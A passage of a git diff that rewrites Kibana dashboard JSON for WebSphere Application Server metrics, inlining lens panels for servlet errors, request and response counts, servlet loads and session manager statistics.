+ "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "39707dfa-c5ec-473f-8d7f-43c96a9beaef": { + "columnOrder": [ + "17f33a89-5e4f-4b62-a12e-ea9870e908ac" + ], + "columns": { + "17f33a89-5e4f-4b62-a12e-ea9870e908ac": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Errors", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.errors" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.servlet.errors : * " + }, + "visualization": { + "accessor": "17f33a89-5e4f-4b62-a12e-ea9870e908ac", + "layerId": "39707dfa-c5ec-473f-8d7f-43c96a9beaef", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Number of Errors [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-39707dfa-c5ec-473f-8d7f-43c96a9beaef", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 13, + "i": "310de529-9ca0-46bd-b1cc-223c1a51cb38", + "w": 11, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} + "panelIndex": "310de529-9ca0-46bd-b1cc-223c1a51cb38", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "6bff5182-8367-4e11-8b9a-69bfe903149c": { + "columnOrder": [ + "e5379b96-4137-4122-ae12-4043ff5f1d83", + "1b761837-dde2-418e-b754-b51432eaf95a", + "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", + "302ef164-d49c-4a57-9a96-888917e2c880", + "302ef164-d49c-4a57-9a96-888917e2c880X0" + ], + "columns": { + "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.requests.processed: *" + }, + "isBucketed": false, + "label": "Requests Processed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.requests.processed" + }, + "1b761837-dde2-418e-b754-b51432eaf95a": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of App name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.servlet.app_name" + }, + "302ef164-d49c-4a57-9a96-888917e2c880": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Responses Processed", + "operationType": "formula", + "params": { + "formula": "last_value(websphere_application_server.servlet.responses.processed)", + "isFormulaBroken": false + }, + "references": [ + "302ef164-d49c-4a57-9a96-888917e2c880X0" + ], + "scale": "ratio" + }, + "302ef164-d49c-4a57-9a96-888917e2c880X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.responses.processed: *" + }, + "isBucketed": false, + "label": "Part of Responses Processed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.responses.processed" + }, + "e5379b96-4137-4122-ae12-4043ff5f1d83": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.servlet.requests.processed > 0 or websphere_application_server.servlet.responses.processed > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": "310de529-9ca0-46bd-b1cc-223c1a51cb38", - "w": 11, - "x": 0, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "310de529-9ca0-46bd-b1cc-223c1a51cb38", - "panelRefName": "panel_310de529-9ca0-46bd-b1cc-223c1a51cb38", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "acdff898-96e0-4331-bd7c-47acfa3db816", - "w": 18, - "x": 11, - "y": 0 + "layers": [ + { + "accessors": [ + "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", + "302ef164-d49c-4a57-9a96-888917e2c880" + ], + "layerId": "6bff5182-8367-4e11-8b9a-69bfe903149c", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "1b761837-dde2-418e-b754-b51432eaf95a", + "xAccessor": "e5379b96-4137-4122-ae12-4043ff5f1d83" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "panelIndex": "acdff898-96e0-4331-bd7c-47acfa3db816", - "panelRefName": "panel_acdff898-96e0-4331-bd7c-47acfa3db816", - "type": "lens", - "version": "8.1.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "enhancements": {} + "title": "Number of Processed Requests and Responses [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6bff5182-8367-4e11-8b9a-69bfe903149c", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 13, + "i": "acdff898-96e0-4331-bd7c-47acfa3db816", + "w": 18, + "x": 11, + "y": 0 + }, + "panelIndex": "acdff898-96e0-4331-bd7c-47acfa3db816", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "96a84b63-1fad-48c6-b0de-179dcbfcd741": { + "columnOrder": [ + "2760f523-a7b0-4dd9-adff-5743a44190f4", + "72a036b6-01af-4812-9bcf-f43429e39eb7", + "990fce2d-1026-4d37-85ed-088d392b41f9", + "d2e271e9-cc11-46df-aae0-121042e38bfa" + ], + "columns": { + "2760f523-a7b0-4dd9-adff-5743a44190f4": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "72a036b6-01af-4812-9bcf-f43429e39eb7": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.servlet.app_name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "990fce2d-1026-4d37-85ed-088d392b41f9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.servlet.app_name" + }, + "990fce2d-1026-4d37-85ed-088d392b41f9": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.loaded: *" + }, + "isBucketed": false, + "label": "Loaded Servlets", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.loaded" + }, + "d2e271e9-cc11-46df-aae0-121042e38bfa": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.reloaded: *" + }, + "isBucketed": false, + "label": "Reloaded Servlets", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.reloaded" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.servlet.loaded > 0 or websphere_application_server.servlet.reloaded > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "w": 19, - "x": 29, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "panelRefName": "panel_f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Metrics WebSphere Application Server] Servlet", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd", - "name": "310de529-9ca0-46bd-b1cc-223c1a51cb38:panel_310de529-9ca0-46bd-b1cc-223c1a51cb38", - "type": "lens" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "990fce2d-1026-4d37-85ed-088d392b41f9", + "d2e271e9-cc11-46df-aae0-121042e38bfa" + ], + "layerId": "96a84b63-1fad-48c6-b0de-179dcbfcd741", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "72a036b6-01af-4812-9bcf-f43429e39eb7", + "xAccessor": "2760f523-a7b0-4dd9-adff-5743a44190f4" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } + }, + "title": "Number of Loaded and Reloaded Servlets [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-96a84b63-1fad-48c6-b0de-179dcbfcd741", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd", - "name": "acdff898-96e0-4331-bd7c-47acfa3db816:panel_acdff898-96e0-4331-bd7c-47acfa3db816", - "type": "lens" + "gridData": { + "h": 13, + "i": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", + "w": 19, + "x": 29, + "y": 0 }, - { - "id": "websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd", - "name": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8:panel_f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "type": "lens" - } + "panelIndex": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics WebSphere Application Server] Servlet", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "310de529-9ca0-46bd-b1cc-223c1a51cb38:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "310de529-9ca0-46bd-b1cc-223c1a51cb38:indexpattern-datasource-layer-39707dfa-c5ec-473f-8d7f-43c96a9beaef", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "acdff898-96e0-4331-bd7c-47acfa3db816:indexpattern-datasource-layer-6bff5182-8367-4e11-8b9a-69bfe903149c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8:indexpattern-datasource-layer-96a84b63-1fad-48c6-b0de-179dcbfcd741", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json index ec1c94aad84..10fbe37e736 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json @@ -1,133 +1,583 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"fa304aea-2c1b-4393-aef2-06114a566f7c\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"Appname\",\"fieldName\":\"websphere_application_server.session_manager.app_name\",\"id\":\"fa304aea-2c1b-4393-aef2-06114a566f7c\",\"enhancements\":{}}}}" + "id": "websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyNCwxXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"fa304aea-2c1b-4393-aef2-06114a566f7c\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"Appname\",\"fieldName\":\"websphere_application_server.session_manager.app_name\",\"id\":\"fa304aea-2c1b-4393-aef2-06114a566f7c\",\"enhancements\":{}}}}" + }, + "description": "Session Manager dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed": { + "columnOrder": [ + "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a" + ], + "columns": { + "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Invalidated sessions by Timeouts", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", + "key": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a", + "layerId": "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Invalidated sessions by Timeouts [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 17, + "i": "19872277-f696-4e82-a0d0-3a84dbc246e6", + "w": 14, + "x": 0, + "y": 0 }, - "description": "Session Manager dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "panelIndex": "19872277-f696-4e82-a0d0-3a84dbc246e6", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { + "columnOrder": [ + "b0fcb1bb-3640-4710-bb39-4e7ac9985961" + ], + "columns": { + "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Active Sessions", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.sessions.active" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "bb425378-17d3-46b5-aab3-d274bdd9f097", + "key": "websphere_application_server.session_manager.sessions.active", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "websphere_application_server.session_manager.sessions.active" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", + "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Active sessions [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb425378-17d3-46b5-aab3-d274bdd9f097", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 8, + "i": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", + "w": 9, + "x": 14, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "19872277-f696-4e82-a0d0-3a84dbc246e6", - "w": 14, - "x": 0, - "y": 0 + "panelIndex": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "79027b05-459f-4773-823b-238f4e0b907a": { + "columnOrder": [ + "407e0b68-66ae-43db-a9e3-86e632694e6b", + "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", + "a6370094-15b2-4777-ac22-fe0612a6d34f", + "1dc49faf-ed90-489c-94cc-b145a28cba19" + ], + "columns": { + "1dc49faf-ed90-489c-94cc-b145a28cba19": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Persistent Stores Data Read", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.persistent_stores.data_read" + }, + "407e0b68-66ae-43db-a9e3-86e632694e6b": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.session_manager.app_name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1dc49faf-ed90-489c-94cc-b145a28cba19", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.session_manager.app_name" + }, + "a6370094-15b2-4777-ac22-fe0612a6d34f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Persistent Stores Data Written", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.persistent_stores.data_written" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "19872277-f696-4e82-a0d0-3a84dbc246e6", - "panelRefName": "panel_19872277-f696-4e82-a0d0-3a84dbc246e6", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 8, - "i": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "w": 9, - "x": 14, - "y": 0 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "panelRefName": "panel_db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "layers": [ + { + "accessors": [ + "a6370094-15b2-4777-ac22-fe0612a6d34f", + "1dc49faf-ed90-489c-94cc-b145a28cba19" + ], + "layerId": "79027b05-459f-4773-823b-238f4e0b907a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", + "xAccessor": "407e0b68-66ae-43db-a9e3-86e632694e6b", + "yConfig": [ + { + "color": "#087dea", + "forAccessor": "a6370094-15b2-4777-ac22-fe0612a6d34f" + }, + { + "color": "#60c06d", + "forAccessor": "1dc49faf-ed90-489c-94cc-b145a28cba19" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "gridData": { - "h": 17, - "i": "83e5353e-78da-4523-8a4a-d370afc2eefa", - "w": 25, - "x": 23, - "y": 0 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "83e5353e-78da-4523-8a4a-d370afc2eefa", - "panelRefName": "panel_83e5353e-78da-4523-8a4a-d370afc2eefa", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 9, - "i": "396f488f-0d3c-44c2-bd13-312d9db09222", - "w": 9, - "x": 14, - "y": 8 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "396f488f-0d3c-44c2-bd13-312d9db09222", - "panelRefName": "panel_396f488f-0d3c-44c2-bd13-312d9db09222", - "title": "Created sessions [Metrics WebSphere Application Server]", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics WebSphere Application Server] Session Manager", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9", - "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:panel_19872277-f696-4e82-a0d0-3a84dbc246e6", - "type": "lens" + "yTitle": "Count" + } + }, + "title": "Persistent Store Data Read and Written [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-79027b05-459f-4773-823b-238f4e0b907a", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9", - "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:panel_db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "type": "lens" + "gridData": { + "h": 17, + "i": "83e5353e-78da-4523-8a4a-d370afc2eefa", + "w": 25, + "x": 23, + "y": 0 }, - { - "id": "websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9", - "name": "83e5353e-78da-4523-8a4a-d370afc2eefa:panel_83e5353e-78da-4523-8a4a-d370afc2eefa", - "type": "lens" + "panelIndex": "83e5353e-78da-4523-8a4a-d370afc2eefa", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { + "columnOrder": [ + "b0fcb1bb-3640-4710-bb39-4e7ac9985961" + ], + "columns": { + "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Created Sessions", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.sessions.created" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "10b45b12-77b4-4241-a864-55c5b313cd40", + "key": "websphere_application_server.session_manager.sessions.created", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "websphere_application_server.session_manager.sessions.created" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", + "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Created sessions [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "10b45b12-77b4-4241-a864-55c5b313cd40", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9", - "name": "396f488f-0d3c-44c2-bd13-312d9db09222:panel_396f488f-0d3c-44c2-bd13-312d9db09222", - "type": "lens" + "gridData": { + "h": 9, + "i": "396f488f-0d3c-44c2-bd13-312d9db09222", + "w": 9, + "x": 14, + "y": 8 }, - { - "id": "metrics-*", - "name": "controlGroup_fa304aea-2c1b-4393-aef2-06114a566f7c:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "396f488f-0d3c-44c2-bd13-312d9db09222", + "title": "Created sessions [Metrics WebSphere Application Server]", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics WebSphere Application Server] Session Manager", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "controlGroup_fa304aea-2c1b-4393-aef2-06114a566f7c:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:indexpattern-datasource-layer-0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:bb425378-17d3-46b5-aab3-d274bdd9f097", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "83e5353e-78da-4523-8a4a-d370afc2eefa:indexpattern-datasource-layer-79027b05-459f-4773-823b-238f4e0b907a", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": 